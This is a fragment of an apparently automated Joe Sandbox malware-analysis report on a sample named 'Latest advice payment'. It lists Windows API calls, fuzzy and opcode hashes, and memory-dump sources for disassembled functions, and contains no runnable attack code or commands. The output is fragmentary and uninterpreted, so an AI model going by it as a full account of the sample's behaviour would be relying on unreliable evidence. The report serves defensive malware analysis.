• Opcode ID: 9bda8e7a10a483e89d2a790c4904d0cdcab4c6d0642981d5aea7f8c171330616
• Instruction ID: b73f2a5ebffc0d47b49e047f4883d504a847bf4f347d59229bfcc649fd596a95
• Opcode Fuzzy Hash: 9bda8e7a10a483e89d2a790c4904d0cdcab4c6d0642981d5aea7f8c171330616
• Instruction Fuzzy Hash: 2FB1BD75A00119AFDB14DFA4C888EAEBBF9FF88314B148469F905DB261DB30ED45CB50
APIs
• GetDlgItem.USER32(?,00000001), ref: 005BC283
• GetWindowRect.USER32(00000000,?), ref: 005BC295
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 005BC2F3
• GetDlgItem.USER32(?,00000002), ref: 005BC2FE
• GetWindowRect.USER32(00000000,?), ref: 005BC310
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 005BC364
• GetDlgItem.USER32(?,000003E9), ref: 005BC372
• GetWindowRect.USER32(00000000,?), ref: 005BC383
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 005BC3C6
• GetDlgItem.USER32(?,000003EA), ref: 005BC3D4
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005BC3F1
• InvalidateRect.USER32(?,00000000,00000001), ref: 005BC3FE
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 12ddbb53cd42c75d798d63b37e094b40be81bad5e976309d016f265644a6796f
• Instruction ID: 1272f28dccdd675abf6045095a97f732f83752037713d47a7d50968a8fc770e6
• Opcode Fuzzy Hash: 12ddbb53cd42c75d798d63b37e094b40be81bad5e976309d016f265644a6796f
• Instruction Fuzzy Hash: 89514E71B00205ABDB18CFA9DD99AAEBBBAFB98310F14852DF515D6290DB70AD048B14
APIs
  • Part of subcall function 00561B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00562036,?,00000000,?,?,?,?,005616CB,00000000,?), ref: 00561B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005620D3
• KillTimer.USER32(-00000001,?,?,?,?,005616CB,00000000,?,?,00561AE2,?,?), ref: 0056216E
• DestroyAcceleratorTable.USER32(00000000), ref: 0059BCA6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005616CB,00000000,?,?,00561AE2,?,?), ref: 0059BCD7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005616CB,00000000,?,?,00561AE2,?,?), ref: 0059BCEE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005616CB,00000000,?,?,00561AE2,?,?), ref: 0059BD0A
• DeleteObject.GDI32(00000000), ref: 0059BD1C
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: f77c5e0e37769a3f7cb62ed832d3b61b0ffbf48123b5fdc6b953b408e0f74381
• Instruction ID: c06133b03b0ededea3d9a429dc9cb3b57acebd46a79ac23a20d0e3c690b7b0a1
• Opcode Fuzzy Hash: f77c5e0e37769a3f7cb62ed832d3b61b0ffbf48123b5fdc6b953b408e0f74381
• Instruction Fuzzy Hash: 7D617B30505E51DFEB399F14EA88B297BF2FB50312F109929E5839B960CBB4A891DB50
APIs
  • Part of subcall function 005625DB: GetWindowLongW.USER32(?,000000EB), ref: 005625EC
• GetSysColor.USER32(0000000F), ref: 005621D3
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: 498259ab13bf98dd57d40d270026a95991c3b82499dae5806d3100fb193e021d
• Instruction ID: 2288cfb6f6422e36592ae688cd3e44f69dc2b03a49adb64c8ea71c7c752d5060
• Opcode Fuzzy Hash: 498259ab13bf98dd57d40d270026a95991c3b82499dae5806d3100fb193e021d
• Instruction Fuzzy Hash: DF4171350049449BEB295F28EC98BB93F66FB56321F148265FEA58F1E1CB318D42DB11
APIs
• CharLowerBuffW.USER32(?,?,005EF910), ref: 005CA90B
• GetDriveTypeW.KERNEL32(00000061,006189A0,00000061), ref: 005CA9D5
• _wcscpy.LIBCMT ref: 005CA9FF
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 365f2640748ad55411e11d1781fdff9283525e8f55afea514efbff4cf0dae48d
• Instruction ID: 2507ae1c5dff49bfd573fcd19c0d201fb284d8631d817a6188130e4da0db1068
• Opcode Fuzzy Hash: 365f2640748ad55411e11d1781fdff9283525e8f55afea514efbff4cf0dae48d
• Instruction Fuzzy Hash: E3516A351183069FC314EF54C896EAEBFA9BFC4348F14482DF896572A2DB319949CB93
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
• Opcode ID: ecf1eca6d80da85c8cae446cc7aa854324bf6303e95c6703a7f3bfc50809fcba
• Instruction ID: d313d2945ad5deb7e6e64cbe34e8e4a10ff4126553eea88e73ab9e35afe75743
• Opcode Fuzzy Hash: ecf1eca6d80da85c8cae446cc7aa854324bf6303e95c6703a7f3bfc50809fcba
• Instruction Fuzzy Hash: 4641B371504206AFEF24EF74D846E7A7FE8FF45310F24486EE949DB292EA719942CB10
APIs
• _memset.LIBCMT ref: 005E716A
• CreateMenu.USER32 ref: 005E7185
• SetMenu.USER32(?,00000000), ref: 005E7194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005E7221
• IsMenu.USER32(?), ref: 005E7237
• CreatePopupMenu.USER32 ref: 005E7241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005E726E
• DrawMenuBar.USER32 ref: 005E7276
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: ed72acc5c0d24012280e19439c829954db9845432dca7629ba79cedc8e4fd222
• Instruction ID: 0af505c3c7a2e85cbe1e79e826ca3e09487315b9df5d91af68acb9e0de3eab60
• Opcode Fuzzy Hash: ed72acc5c0d24012280e19439c829954db9845432dca7629ba79cedc8e4fd222
• Instruction Fuzzy Hash: 78418C78A01249EFDB24DF65E884E9A7BF5FF58300F144069FA85A7350D731A914DF90
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 005E755E
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 005E7565
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 005E7578
                                                            • SelectObject.GDI32(00000000,00000000), ref: 005E7580
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 005E758B
                                                            • DeleteDC.GDI32(00000000), ref: 005E7594
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 005E759E
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 005E75B2
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 005E75BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: static
                                                            • API String ID: 2559357485-2160076837
                                                            • Opcode ID: 02b8a091f86922a7d74d23991baee0cb7495b43a103ccab7047becd5e5f86765
                                                            • Instruction ID: 64ef3ce6cd87a37d8d2d760111141a30c0cf5e6fd83771871e0289c3f402aec5
                                                            • Opcode Fuzzy Hash: 02b8a091f86922a7d74d23991baee0cb7495b43a103ccab7047becd5e5f86765
                                                            • Instruction Fuzzy Hash: 1A317A32105299ABDF199F65DC48FEA3F69FF1D320F100225FA95960A0CB31D811EBA4
                                                            APIs
                                                            • _memset.LIBCMT ref: 00586E3E
                                                              • Part of subcall function 00588B28: __getptd_noexit.LIBCMT ref: 00588B28
                                                            • __gmtime64_s.LIBCMT ref: 00586ED7
                                                            • __gmtime64_s.LIBCMT ref: 00586F0D
                                                            • __gmtime64_s.LIBCMT ref: 00586F2A
                                                            • __allrem.LIBCMT ref: 00586F80
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00586F9C
                                                            • __allrem.LIBCMT ref: 00586FB3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00586FD1
                                                            • __allrem.LIBCMT ref: 00586FE8
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00587006
                                                            • __invoke_watson.LIBCMT ref: 00587077
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction ID: 20d9d3b83df81592d4567fc2a188a8d3327b7c9d0faa5f0f6e1e87faf3da4124
                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction Fuzzy Hash: C471E576A00717EBDB14BE68DC45B6BBBA8BF44364F144629F914F7281E770ED408B90
                                                            APIs
                                                            • _memset.LIBCMT ref: 005C2542
                                                            • GetMenuItemInfoW.USER32(00625890,000000FF,00000000,00000030), ref: 005C25A3
                                                            • SetMenuItemInfoW.USER32(00625890,00000004,00000000,00000030), ref: 005C25D9
                                                            • Sleep.KERNEL32(000001F4), ref: 005C25EB
                                                            • GetMenuItemCount.USER32(?), ref: 005C262F
                                                            • GetMenuItemID.USER32(?,00000000), ref: 005C264B
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 005C2675
                                                            • GetMenuItemID.USER32(?,?), ref: 005C26BA
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005C2700
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C2714
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C2735
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: 5e994f0c8e24e387f46a4db9a161fc9ded6f5d5fee7966221a0549d662fc17c9
                                                            • Instruction ID: 528d033b7a1cd17c25086bcdc61c09cdb41ab9b0ea18184f7f26cd5ed1e6a2f9
                                                            • Opcode Fuzzy Hash: 5e994f0c8e24e387f46a4db9a161fc9ded6f5d5fee7966221a0549d662fc17c9
                                                            • Instruction Fuzzy Hash: 15617BB4900249AFDB21CFA4CC88EAE7FB9FB55344F14046DE842A7291DB31AE45DB21
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 005E6FA5
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 005E6FA8
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005E6FCC
                                                            • _memset.LIBCMT ref: 005E6FDD
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005E6FEF
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 005E7067
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: da76f7dc68e77af58d9ccfc3764c587ef279170e57d59b9b413ef6abe853a732
                                                            • Instruction ID: 350a02d6bed860346f53cb5c6d79dea473cd85d64c6199a09539eb11c3d514c8
                                                            • Opcode Fuzzy Hash: da76f7dc68e77af58d9ccfc3764c587ef279170e57d59b9b413ef6abe853a732
                                                            • Instruction Fuzzy Hash: EB618B75900298AFDB24DFA4CC85EEE7BB9FB48700F100159FA55EB2A1C771AD41DB90
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 005B6BBF
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 005B6C18
                                                            • VariantInit.OLEAUT32(?), ref: 005B6C2A
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 005B6C4A
                                                            • VariantCopy.OLEAUT32(?,?), ref: 005B6C9D
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 005B6CB1
                                                            • VariantClear.OLEAUT32(?), ref: 005B6CC6
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 005B6CD3
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005B6CDC
                                                            • VariantClear.OLEAUT32(?), ref: 005B6CEE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005B6CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 0250a8e15d2519abfb0d3e5fe71ed916044362b9c79808e18243b6f5e4e1d11f
                                                            • Instruction ID: ca608b4db2ed59c32d3c5efa64a4a839fa8f6ed4ba4c74827662e5ec70e0b53a
                                                            • Opcode Fuzzy Hash: 0250a8e15d2519abfb0d3e5fe71ed916044362b9c79808e18243b6f5e4e1d11f
                                                            • Instruction Fuzzy Hash: 4541427590011A9FDF04DF64D888DEEBFB9FF58350F008069E995AB261CB34A949DB90
                                                            APIs
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • CoInitialize.OLE32 ref: 005D8403
                                                            • CoUninitialize.OLE32 ref: 005D840E
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,005F2BEC,?), ref: 005D846E
                                                            • IIDFromString.OLE32(?,?), ref: 005D84E1
                                                            • VariantInit.OLEAUT32(?), ref: 005D857B
                                                            • VariantClear.OLEAUT32(?), ref: 005D85DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: a16912c9d591eb8b0eaf80e95c6b2cd68c409024d2edd593558c9fbdb5c73293
                                                            • Instruction ID: f44f1b0ef7a76e9f58440faf243b9c9fbc437a0850c31d3d2627d07347d6e08c
                                                            • Opcode Fuzzy Hash: a16912c9d591eb8b0eaf80e95c6b2cd68c409024d2edd593558c9fbdb5c73293
                                                            • Instruction Fuzzy Hash: 74616E70608712AFD720DF58D888F6ABBE8BF85754F04491AF9819B391DB70ED44CB92
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 005D5793
                                                            • inet_addr.WSOCK32(?,?,?), ref: 005D57D8
                                                            • gethostbyname.WSOCK32(?), ref: 005D57E4
                                                            • IcmpCreateFile.IPHLPAPI ref: 005D57F2
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005D5862
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005D5878
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 005D58ED
                                                            • WSACleanup.WSOCK32 ref: 005D58F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: 7a523e7c28ab5d14a69c33582d82ee553663262bacdd577b926c002ace78f41d
                                                            • Instruction ID: 7946eda2ace54c2f5cfac9ae64f09240e1683ba524054151a756c6eda7e8e9e1
                                                            • Opcode Fuzzy Hash: 7a523e7c28ab5d14a69c33582d82ee553663262bacdd577b926c002ace78f41d
                                                            • Instruction Fuzzy Hash: 63515E716046019FD7209F28DC89B6A7FE4FB44710F14492BF996DB3A1EB30E904EB41
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 005CB4D0
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 005CB546
                                                            • GetLastError.KERNEL32 ref: 005CB550
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 005CB5BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 6a3c973f6f2d2ce48c4098b1a003ea63858589448cb0ce74f299dc265e7c8c48
                                                            • Instruction ID: 4a14db0eb0640fda001f10089b7b92f1d95282d935c0d074a660b008f28d86ab
                                                            • Opcode Fuzzy Hash: 6a3c973f6f2d2ce48c4098b1a003ea63858589448cb0ce74f299dc265e7c8c48
                                                            • Instruction Fuzzy Hash: C131B235E4020ADFDB00DFA8C88AFAD7FB4FF48310F144029E5019B291EB719A46CB50
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 005BAABC
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 005B9014
                                                            • GetDlgCtrlID.USER32 ref: 005B901F
                                                            • GetParent.USER32 ref: 005B903B
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 005B903E
                                                            • GetDlgCtrlID.USER32(?), ref: 005B9047
                                                            • GetParent.USER32(?), ref: 005B9063
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 005B9066
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 6607cd5d2bf0b604f4b2df45bc549ce91cbaf61fcca5b216713a0630674015cd
                                                            • Instruction ID: 3787299920ac0b2e986e6e7909c46266883b8e1d48eb1e1c5cc634b89d433553
                                                            • Opcode Fuzzy Hash: 6607cd5d2bf0b604f4b2df45bc549ce91cbaf61fcca5b216713a0630674015cd
                                                            • Instruction Fuzzy Hash: 5821D374A00149BBDF04ABA0CC89EFEBF75FF99310F104169B961972A1DF755819DB20
APIs
  • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
